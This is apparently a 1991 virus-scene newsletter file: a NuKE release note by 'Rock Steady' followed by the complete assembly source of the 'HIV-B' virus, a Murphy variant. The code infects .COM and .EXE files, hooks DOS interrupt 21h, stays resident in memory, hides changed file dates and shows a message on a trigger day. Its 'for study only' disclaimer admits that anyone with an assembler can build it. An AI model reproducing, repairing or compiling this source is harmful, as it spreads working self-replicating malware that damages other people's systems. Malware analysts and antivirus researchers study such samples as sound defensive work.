;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;

──────────────────────> HIV Virus Source

   HIV - VIRUS
   Created: March 1991
   Scan ID: [Murphy]
   Origin:  Italy, "Italian Virus Laboratory!"
   Sources: Produced by Rock Steady [NukE]

[NukE] Notes:
~~~~~~~~~~~~~
Okay, another VIRUS SOURCE Release from [NukE]! Yup, Anywayz, this Virus cums from the Murphy Virus! So if you Scan it with SCAN McAfee & Ass. you will see that it will be detected as the [Murphy] Virus! I got this Virus from Italy from the "Italian Virus Laboratory!" Mind you, this Virus Source is being released to the public because it's an OLD Virus and is detectable, and doesn't do any damage to the system! This virus was edited by me, I removed some bugs inside and produced this SOURCE CODE ONLY!

[NOTE] Of course, this virus is ONLY for STUDYING, to learn how viruses are made! After the viruses are old it's NICE to release them so people can study em!

HOW THE HIV - VIRUS WORKS

First, I'd like to thanx all those that thanked me for my latest Virus! (ParaSite Virus)!
And I'm glad to say I'll be releasing the Source Codes to this virus in 6 MONTHS! Hopefully, by that time it will be Detected by SCAN (McAfee & Ass) and yall will get a chance to study this Awesome Virus made totally by me...

HIV -:
~~~~~~
This virus Spreads thru copying itself to .EXE and .COM Files! You will notice the file gets larger by 1614 Bytes! The Virus Hooks itself to Interrupt 21h and total system memory will be 1632 Bytes Less. Once the file is resident in Memory it will attach itself to every file that is run or opened! The date of the original file does not change! All this virus does is Copy itself over and over again! CleanUp V77+ will get rid of it...or Simply delete all files Infected with the virus...Anywayz Enjoy...

NOTE: If you want to compile the source, simply look for it in the .TXT files contained in DATA.EXE in this newsletter package.

DATA_1E EQU 4CH ; Just a Few Data Segments that are DATA_3E EQU 84H ; Needed for the virus to find some DATA_5E EQU 90H ; hard core info... DATA_7E EQU 102H DATA_8E EQU 106H DATA_9E EQU 122H DATA_10E EQU 124H DATA_11E EQU 15AH DATA_12E EQU 450H DATA_13E EQU 462H DATA_14E EQU 47BH DATA_15E EQU 0 DATA_16E EQU 1 DATA_17E EQU 2 DATA_18E EQU 6 DATA_42E EQU 0FB2CH DATA_43E EQU 0FB2EH DATA_44E EQU 0FB4BH DATA_45E EQU 0FB4DH DATA_46E EQU 0FB83H DATA_47E EQU 0FB8DH DATA_48E EQU 0FB8FH DATA_49E EQU 0FB95H DATA_50E EQU 0FB97H DATA_51E EQU 0 DATA_52E EQU 2 SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h HIV PROC FAR START: JMP LOC_35 DB 0C3H DB 23 DUP (0C3H) DB 61H, 6EH, 74H, 69H, 64H, 65H DB 62H, 0C3H, 0C3H, 0C3H, 0C3H DB 'HIV-B Virus - Release 1.1 [NukE]' DB ' ' copyright DB '(C) Edited by Rock Steady [NukE]' DB 0, 0 DATA_24 DW 0 DATA_25 DW 0 DATA_26 DW 0 DATA_27 DW 706AH DATA_28 DD 00000H DATA_29 DW 0 DATA_30 DW 706AH DATA_31 DD 00000H DATA_32 DW 0 DATA_33 DW 706AH DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH DB 'Edited by Rock Steady [NukE]', 0AH, 0DH DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH DB '$' DB 0E8H, 83H, 3, 3DH, 4DH, 4BH DB 75H, 9, 55H, 8BH, 0ECH, 83H DB 66H, 6, 0FEH, 5DH, 0CFH, 80H DB 0FCH, 4BH, 74H, 12H, 3DH, 0 DB 3DH, 74H, 0DH, 3DH, 0, 6CH DB 75H, 5, 80H, 0FBH, 0, 74H DB 3 LOC_1: JMP LOC_13 LOC_2: PUSH ES ; Save All Regesters so that when PUSH DS ; we restore the program it will PUSH DI ; RUN correctly and hide the fact PUSH SI ; that any Virii is tampering with PUSH BP ; the System.... PUSH DX PUSH CX PUSH BX PUSH AX CALL SUB_6 CALL SUB_7 CMP AX,6C00H JNE LOC_3 ; Jump if not equal MOV DX,SI LOC_3: MOV CX,80H MOV SI,DX LOCLOOP_4: INC SI ; Slowly down the System a MOV AL,[SI] ; little. OR AL,AL ; Zero ? LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0 SUB SI,2 CMP WORD PTR [SI],4D4FH JE LOC_7 ; Jump if equal CMP WORD PTR [SI],4558H JE LOC_6 ; Jump if equal LOC_5: JMP SHORT LOC_12 ; DB 90H LOC_6: CMP WORD PTR [SI-2],452EH JE LOC_8 ; Jump if equal JMP SHORT LOC_5 ; LOC_7: NOP CMP WORD PTR [SI-2],432EH JNE LOC_5 ; Jump if not equal LOC_8: MOV AX,3D02H CALL SUB_5 JC LOC_12 ; Jump if carry Set MOV BX,AX MOV AX,5700H CALL SUB_5 ; Initsilize the virus... 
MOV CS:DATA_24,CX ; A Basic Start up to check MOV CS:DATA_25,DX ; The Interrup 21h MOV AX,4200H XOR CX,CX XOR DX,DX CALL SUB_5 PUSH CS POP DS MOV DX,103H MOV SI,DX MOV CX,18H MOV AH,3FH CALL SUB_5 JC LOC_10 ; Jump if carry Set CMP WORD PTR [SI],5A4DH JNE LOC_9 ; Jump if not equal CALL SUB_1 JMP SHORT LOC_10 LOC_9: CALL SUB_4 LOC_10: JC LOC_11 ; Jump if carry Set MOV AX,5701H MOV CX,CS:DATA_24 MOV DX,CS:DATA_25 CALL SUB_5 LOC_11: MOV AH,3EH ; '>' CALL SUB_5 LOC_12: CALL SUB_7 POP AX ; A Stealth Procedure to POP BX ; end the virus and restore POP CX ; the program! Pup back all POP DX ; regesters as we found them! POP BP ; so nothings changed... POP SI POP DI POP DS POP ES LOC_13: JMP CS:DATA_28 DB 0B4H, 2AH, 0CDH, 21H, 0C3H HIV ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_1 PROC NEAR ; Start of the Virus! MOV AH,2AH ; Get the Date system Date! INT 21H ; If its Friday Display the ; message at Data34 and End! CMP AL,6 JE LOC_15 ; If Friday display message JNZ LOC_14 ; If not continue infecting LOC_14: ; and screwing the system! MOV CX,[SI+16H] ADD CX,[SI+8] MOV AX,10H MUL CX ; dx:ax = reg * ax ADD AX,[SI+14H] ADC DX,0 PUSH DX PUSH AX MOV AX,4202H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 CMP DX,0 JNE LOC_16 ; Jump if not equal CMP AX,64EH JAE LOC_16 ; Jump if above or = POP AX POP DX STC ; Set carry flag RETN LOC_15: MOV DX,OFFSET DATA_34+18H ; Display Message at Data34! MOV AH,9 ; With New Offset Address in INT 21H ; memory! ; POP AX ; Restore all Regesters as if POP BX ; nothing was changed and exit POP CX ; virus and run File... POP DX POP SI POP DI POP BP POP DS POP ES MOV AH,0 ; Exit Virus if your in a .EXE INT 21H ; File!!! ; Exit virus if your in a .COM INT 20H ; File!!! 
LOC_16: MOV DI,AX MOV BP,DX POP CX SUB AX,CX POP CX SBB DX,CX CMP WORD PTR [SI+0CH],0 JE LOC_RET_19 ; Jump if equal CMP DX,0 JNE LOC_17 ; Jump if not equal CMP AX,64EH JNE LOC_17 ; Jump if not equal STC ; Set carry flag RETN LOC_17: MOV DX,BP MOV AX,DI PUSH DX PUSH AX ADD AX,64EH ADC DX,0 MOV CX,200H DIV CX ; Find out How much System LES DI,DWORD PTR [SI+2] ; memory is available... MOV CS:DATA_26,DI ; MOV CS:DATA_27,ES ; Every so often make the MOV [SI+2],DX ; system memory small than CMP DX,0 ; what it already is... JE LOC_18 ; Screws up the users hehe INC AX LOC_18: MOV [SI+4],AX POP AX POP DX CALL SUB_2 SUB AX,[SI+8] LES DI,DWORD PTR [SI+14H] MOV DS:DATA_9E,DI MOV DS:DATA_10E,ES MOV [SI+14H],DX ; Tie up some memory! MOV [SI+16H],AX ; release it on next execution MOV DS:DATA_11E,AX ; Jump to su routine to do MOV AX,4202H ; this and disable interrups XOR CX,CX XOR DX,DX CALL SUB_5 CALL SUB_3 JC LOC_RET_19 MOV AX,4200H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 MOV AH,40H MOV DX,SI MOV CX,18H CALL SUB_5 LOC_RET_19: RETN SUB_1 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_2 PROC NEAR MOV CX,4 MOV DI,AX AND DI,0FH LOCLOOP_20: SHR DX,1 ; Shift w/zeros fill RCR AX,1 ; Rotate thru carry LOOP LOCLOOP_20 ; Loop if cx > 0 MOV DX,DI RETN SUB_2 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_3 PROC NEAR MOV AH,40H MOV CX,64EH MOV DX,100H CALL SUB_6 JMP SHORT LOC_24 DB 90H ;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_4: MOV AX,4202H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 CMP AX,64EH JB LOC_RET_23 ; Jump if below CMP AX,0FA00H JAE LOC_RET_23 ; Jump if above or = PUSH AX CMP BYTE PTR [SI],0E9H JNE LOC_21 ; Jump if not equal SUB AX,651H CMP 
AX,[SI+1] JNE LOC_21 ; Jump if not equal POP AX STC ; Set carry flag RETN LOC_21: CALL SUB_3 JNC LOC_22 ; Jump if carry=0 POP AX RETN LOC_22: MOV AX,4200H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 POP AX SUB AX,3 MOV DX,122H MOV SI,DX MOV BYTE PTR CS:[SI],0E9H MOV CS:[SI+1],AX MOV AH,40H MOV CX,3 CALL SUB_5 LOC_RET_23: RETN SUB_3 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_5 PROC NEAR LOC_24: PUSHF ; Push flags CALL CS:DATA_28 RETN SUB_5 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_6 PROC NEAR PUSH AX PUSH DS PUSH ES XOR AX,AX ; Zero register PUSH AX POP DS CLI ; Disable the interrupts LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus MOV CS:DATA_29,AX ; to the COM File... MOV CS:DATA_30,ES MOV AX,46AH MOV DS:DATA_5E,AX MOV WORD PTR DS:DATA_5E+2,CS LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word.. MOV CS:DATA_32,AX ; get your info needed on MOV CS:DATA_33,ES ; System... LES AX,CS:DATA_31 MOV DS:DATA_1E,AX MOV WORD PTR DS:DATA_1E+2,ES STI ; Enable the interrupts POP ES ; and restore regesters! POP DS ; go back to the file POP AX ; being executed... 
RETN SUB_6 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_7 PROC NEAR PUSH AX PUSH DS PUSH ES XOR AX,AX ; Zero register PUSH AX POP DS CLI ; Disable interrupts LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy MOV DS:DATA_5E,AX ; yourself to the EXE MOV WORD PTR DS:DATA_5E+2,ES LES AX,DWORD PTR CS:DATA_32 MOV DS:DATA_1E,AX MOV WORD PTR DS:DATA_1E+2,ES STI ; Enable interrupts POP ES POP DS POP AX RETN SUB_7 ENDP DB 0B0H, 3, 0CFH, 50H, 53H, 51H DB 52H, 56H, 57H, 55H, 1EH, 6 DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH DB 62H, 4, 0A1H, 50H, 4, 2EH DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H DB 4, 0A3H, 50H, 4, 2EH, 0A1H DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9 DB 0B9H, 1, 0, 0CDH, 10H, 0E8H DB 34H, 0, 0E8H, 0B7H, 0, 2EH DB 0A1H, 0C7H, 4, 0A3H, 50H, 4 DB 0B3H, 2, 0B8H, 2, 9, 0B9H DB 1, 0, 0CDH, 10H, 2EH, 0A1H DB 0CEH, 4, 0A3H, 50H, 4, 7 DB 1FH DB ']_^ZY[X.' DB 0FFH, 2EH, 0CAH, 4 DATA_36 DW 0 DATA_37 DW 1010H DATA_39 DB 0 DATA_40 DD 706A0000H DB 0, 0, 2EH, 0A1H, 0C7H, 4 DB 8BH, 1EH, 4AH, 4, 4BH, 2EH DB 0F6H, 6, 0C9H, 4, 1, 74H DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH DB 80H, 36H, 0C9H, 4, 1, 0EBH DB 0AH LOC_25: CMP AL,0 JG LOC_26 ; Jump if > XOR CS:DATA_39,1 LOC_26: TEST CS:DATA_39,2 JZ LOC_27 ; Jump if zero CMP AH,18H JB LOC_28 ; Jump if below XOR CS:DATA_39,2 JMP SHORT LOC_28 LOC_27: CMP AH,0 JG LOC_28 ; Jump if > XOR CS:DATA_39,2 LOC_28: CMP BYTE PTR CS:DATA_36,20H JE LOC_29 ; Jump if equal CMP BYTE PTR CS:DATA_37+1,0 JE LOC_29 ; Jump if equal XOR CS:DATA_39,2 LOC_29: TEST CS:DATA_39,1 JZ LOC_30 ; Jump if zero INC BYTE PTR CS:DATA_37 JMP SHORT LOC_31 LOC_30: DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H) LOC_31: TEST CS:DATA_39,2 ; (706A:04C9=0) JZ LOC_32 ; Jump if zero INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) JMP SHORT LOC_RET_33 ; (0555) LOC_32: DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) LOC_RET_33: RETN 
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_8 PROC NEAR MOV AX,CS:DATA_37 MOV DS:DATA_12E,AX ; Get info on type of Video MOV BH,DS:DATA_13E ; Display the system has... MOV AH,8 INT 10H ; with ah=functn 08h ; basically fuck the cursur.. MOV CS:DATA_36,AX RETN SUB_8 ENDP DB 50H, 53H, 51H, 52H, 56H, 57H DB 55H, 1EH, 6, 33H, 0C0H, 50H DB 1FH, 81H, 3EH, 70H, 0, 6DH DB 4, 74H, 35H, 0A1H, 6CH, 4 DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0 DB 75H, 24H, 0FAH, 8BH, 2EH, 50H DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH DB 50H, 4, 0C4H, 6, 70H, 0 DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH DB 6, 0CCH, 4, 0C7H, 6, 70H DB 0, 6DH, 4, 8CH, 0EH, 72H DB 0, 0FBH LOC_34: POP ES POP DS ; Restore and get lost... POP BP POP DI POP SI POP DX POP CX POP BX POP AX RETN ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_9 PROC NEAR MOV DX,10H MUL DX ; dx:ax = reg * ax RETN SUB_9 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_10 PROC NEAR XOR AX,AX ; If if wants to dissamble XOR BX,BX ; us give him a HARD time... XOR CX,CX ; By making all into 0 XOR DX,DX ; Zero register XOR SI,SI ; Zero register XOR DI,DI ; Zero register XOR BP,BP ; Zero register RETN SUB_10 ENDP LOC_35: PUSH DS CALL SUB_11 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_11 PROC NEAR MOV AX,4B4DH INT 21H ; Load and EXEC file... ; be runned... 
NOP JC LOC_36 ; Jump if carry Set JMP LOC_46 LOC_36: POP SI PUSH SI MOV DI,SI XOR AX,AX ; Zero register PUSH AX POP DS LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr MOV CS:DATA_49E[SI],AX ; Move lots of data MOV CS:DATA_50E[SI],ES ; into CS to infect the file LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit.. MOV CS:DATA_47E[DI],BX MOV CS:DATA_48E[DI],ES MOV AX,DS:DATA_7E CMP AX,0F000H JNE LOC_44 ; Jump if not equal MOV DL,80H MOV AX,DS:DATA_8E CMP AX,0F000H JE LOC_37 ; Jump if equal CMP AH,0C8H JB LOC_44 ; Jump if below CMP AH,0F4H JAE LOC_44 ; Jump if above or = TEST AL,7FH JNZ LOC_44 ; Jump if not zero MOV DS,AX CMP WORD PTR DS:DATA_51E,0AA55H JNE LOC_44 ; Jump if not equal MOV DL,DS:DATA_52E LOC_37: MOV DS,AX XOR DH,DH ; Zero register MOV CL,9 SHL DX,CL ; Shift w/zeros fill MOV CX,DX XOR SI,SI ; Zero register LOCLOOP_38: LODSW ; String [si] to ax CMP AX,0FA80H JNE LOC_39 ; Jump if not equal LODSW ; String [si] to ax CMP AX,7380H JE LOC_40 ; Jump if equal JNZ LOC_41 ; Jump if not zero LOC_39: CMP AX,0C2F6H JNE LOC_42 ; Jump if not equal LODSW ; String [si] to ax CMP AX,7580H JNE LOC_41 ; Jump if not equal LOC_40: INC SI LODSW ; String [si] to ax CMP AX,40CDH JE LOC_43 ; Jump if equal SUB SI,3 LOC_41: DEC SI DEC SI LOC_42: DEC SI LOOP LOCLOOP_38 ; Loop if cx > 0 JMP SHORT LOC_44 LOC_43: SUB SI,7 MOV CS:DATA_49E[DI],SI MOV CS:DATA_50E[DI],DS LOC_44: MOV AH,62H INT 21H ; Simple...Get the PSP ; Address (Program segment MOV ES,BX ; address and but in BX) MOV AH,49H INT 21H ; Get the Free memory from ; the system MOV BX,0FFFFH ; release extra memory blocks MOV AH,48H INT 21H ; Allocate the memory ; At BX (# bytes) SUB BX,66H ; it attaches virus right NOP ; under the 640k JC LOC_46 MOV CX,ES ; did it work? If not just STC ; end the virus... ADC CX,BX MOV AH,4AH INT 21H ; Adjust teh memory block ; size! BX has the # of bytes MOV BX,65H STC ; Set carry flag SBB ES:DATA_17E,BX ; Where to attach itself! 
PUSH ES ; under 640K MOV ES,CX MOV AH,4AH INT 21H ; Just change the memory ; allocations! (BX=Btyes Size) MOV AX,ES DEC AX MOV DS,AX MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k CALL SUB_9 MOV BX,AX MOV CX,DX POP DS MOV AX,DS CALL SUB_9 ADD AX,DS:DATA_18E ADC DX,0 SUB AX,BX SBB DX,CX JC LOC_45 ; Jump if carry Set SUB DS:DATA_18E,AX LOC_45: MOV SI,DI XOR DI,DI ; Zero register PUSH CS POP DS SUB SI,4D7H MOV CX,64EH INC CX REP MOVSB ; Rep when cx >0 Mov [si] to MOV AH,62H ; es:[di] INT 21H ; Get the Program segment ; prefix...so we can infect it DEC BX MOV DS,BX MOV BYTE PTR DS:DATA_15E,5AH MOV DX,1E4H XOR AX,AX ; Zero register PUSH AX POP DS MOV AX,ES SUB AX,10H MOV ES,AX CLI ; Disable interrupts MOV DS:DATA_3E,DX ; MOV WORD PTR DS:DATA_3E+2,ES STI ; Enable interrupts DEC BYTE PTR DS:DATA_14E ; LOC_46: POP SI CMP WORD PTR CS:DATA_42E[SI],5A4DH JNE LOC_47 ; Jump if not equal POP DS MOV AX,CS:DATA_46E[SI] MOV BX,CS:DATA_45E[SI] ; all this shit is to restore PUSH CS ; the program and continue POP CX ; running the original SUB CX,AX ; program... ADD CX,BX PUSH CX PUSH WORD PTR CS:DATA_44E[SI] PUSH DS POP ES CALL SUB_10 RETF LOC_47: POP AX MOV AX,CS:DATA_42E[SI] MOV WORD PTR CS:[100H],AX MOV AX,CS:DATA_43E[SI] MOV WORD PTR CS:[102H],AX MOV AX,100H PUSH AX PUSH CS POP DS PUSH DS POP ES CALL SUB_10 RETN SUB_11 ENDP SEG_A ENDS END START Rock Steady [NuKE] ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. 
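A file-level detector built from the listing's own "already infected" tests, as an added example that is not part of the original release: SUB_4 skips a .COM file whose first byte is E9h and whose following word equals the file size minus 651h, and SUB_1 skips an .EXE whose header entry point lies exactly 64Eh (1614) bytes before end of file. The function names and the sample layouts are assumptions made for this example; the samples are constructed filler bytes and contain no code from the listing.

```python
import struct

VIRUS_LEN = 0x64E  # 1614 bytes: the file growth stated in the write-up
# Text from the listing's DB lines; specific to this edited release.
MARKERS = (b"HIV-B Virus - Release 1.1 [NukE]",
           b"HIV-B VIRUS - Release 1.1 [NukE]")

def com_self_mark(data: bytes) -> bool:
    """SUB_4's skip test: byte 0 is E9h and the next word is size - 651h."""
    if len(data) < VIRUS_LEN + 3 or data[0] != 0xE9:
        return False
    (disp,) = struct.unpack_from("<H", data, 1)
    return disp == len(data) - (VIRUS_LEN + 3)

def exe_self_mark(data: bytes) -> bool:
    """SUB_1's skip test: header entry point lies exactly 64Eh before EOF."""
    if len(data) < 0x18 or data[:2] != b"MZ":
        return False
    (hdr_paras,) = struct.unpack_from("<H", data, 0x08)
    ip, cs = struct.unpack_from("<HH", data, 0x14)
    # Same arithmetic as the listing: (CS + header paragraphs) * 16 + IP
    entry = ((cs + hdr_paras) & 0xFFFF) * 16 + ip
    return len(data) - entry == VIRUS_LEN

def classify(data: bytes) -> list:
    """Return the names of every indicator that matches this file image."""
    findings = []
    if any(m in data for m in MARKERS):
        findings.append("marker-string")
    if com_self_mark(data):
        findings.append("com-self-mark")
    if exe_self_mark(data):
        findings.append("exe-self-mark")
    return findings

# Constructed layouts (filler only) that reproduce the size relationships.
def sample_com(host_len: int) -> bytes:
    head = b"\xE9" + struct.pack("<H", host_len - 3)
    return head + b"\x90" * (host_len - 3) + b"\x00" * VIRUS_LEN

def sample_exe(host_len: int, hdr_paras: int = 2) -> bytes:
    hdr = bytearray(hdr_paras * 16)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, 0x08, hdr_paras)
    struct.pack_into("<HH", hdr, 0x14, host_len & 0xF,
                     (host_len >> 4) - hdr_paras)
    return bytes(hdr) + b"\x90" * (host_len - len(hdr)) + b"\x00" * VIRUS_LEN

if __name__ == "__main__":
    for name, blob in [("clean.com", b"\x90" * 0x800),
                       ("a.com", sample_com(0x700)),
                       ("b.exe", sample_exe(0x1234))]:
        print(name, classify(blob))
```

The structural checks survive a change to the embedded text, while the marker strings only match this particular edit; a hit on either is a reason to compare the file against a known-good copy, not proof on its own.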